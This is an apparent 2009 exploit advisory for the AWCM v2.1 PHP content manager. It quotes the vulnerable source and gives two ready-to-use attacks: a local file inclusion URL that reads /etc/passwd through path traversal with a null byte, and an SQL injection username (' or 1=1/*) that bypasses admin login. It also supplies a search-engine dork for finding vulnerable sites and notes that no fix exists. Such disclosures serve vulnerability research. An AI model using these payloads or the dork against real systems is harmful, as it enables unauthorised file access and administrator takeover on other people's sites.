AWCM 2.1 Local File Inclusion - Auth Bypass Vulnerabilities

2009-07-23 18:04:05

---------------------------------AWCM v2.1 (LFI/Auth Bypass) Vulnerabilities---------------------------------------
#
# #### # ### ## ### #### #### ### ##### #### #### ### # ### #### ######
## # # ## # # # # # # # # # # # # # # # # # # # ## # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # #
# # ### # # ### # # ## ### ### # # # # ### ## # # # ### #
#### # # #### # # ###### # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # ## # # # # # # # ## # #
## ##### ## ###### ### ### #### ### # # ### #### #### ### # ### # #### ###


#----------------------------------------------------------------------------------------------------------------
Script : AWCM
version : v2.1
Language:PHP
Demo : http://awcm.sourceforge.net/
Download : http://awcm.sourceforge.net/ar/down_pro.php?id=30
Dork: intext:Powered by AWCM v2.1
Found by :SwEET-DeViL

need magic_quotes_gpc = Off

#----------------------------------------------------------------------------------------------------------------
::: Local File Disclosure Vulnerability :::
)=> a.php
.................................................................................................................
if (isset($_GET['a'])) {
$a = $_GET['a']; <======================================:{
if (file_exists("addons/$a/index.php")) {
include ("addons/$a/index.php");
}
.................................................................................................................
#Exploit:

http://www.site.com/a.php?a=../../../../../../../../etc/passwd%00

##############################################################################
::: Auth Bypass SQL Injection Vulnerability :::

)=> login.php AND control/login.php

.................................................................................................................
if(isset($_GET['do'])) {
$user = $_POST['username']; <======================================:{
$pass = md5($_POST['password']);

$cp_login_query = mysql_query("SELECT id,username,password,level FROM awcm_members WHERE level = 'admin' AND username = '$user' AND password = '$pass'");
.................................................................................................................
#Exploit:

put as username : 'or 1=1/*

##############################################################################

www.arab4services.net
/---------------------------------------------------\
|+------------------------------------------------+ |
|| SwEET-DeViL & viP HaCkEr | |
|| gamr-14(at)hotmail.com | |
|+------------------------------------------------+ |
\---------------------------------------------------/

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.